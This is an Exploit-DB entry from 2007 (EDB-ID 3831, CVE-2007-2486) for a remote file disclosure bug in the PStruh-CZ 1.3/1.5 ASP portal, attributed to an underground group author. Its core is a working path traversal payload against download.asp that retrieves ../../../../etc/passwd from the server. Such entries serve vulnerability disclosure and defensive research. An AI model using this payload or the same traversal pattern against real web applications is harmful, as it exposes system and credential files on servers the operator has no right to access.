PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure

EDB-ID:

3831

CVE:

2007-2486

EDB Verified:

Author:

Dj7xpl

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2007-05-02

Vulnerable App:

          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
          |*                                                                                                 *|
          |*                                    Y! Underground Group                                         *|
          |*                                                                                                 *|
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/

          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Portal.....:   PStruh-CZ 1.3&1.5
             Type.......:   Remote File Disclosure Vulnerability
             Author.....:   Dj7xpl / dj7xpl@2600.ir
             HomePage...:   http://Dj7xpl.2600.ir
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/


          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Bug........:

	     download.asp?File=[File Path]&PT=[PostFix]
             download.asp?File=../../../../etc/passwd&pt=zip
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/

# milw0rm.com [2007-05-02]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services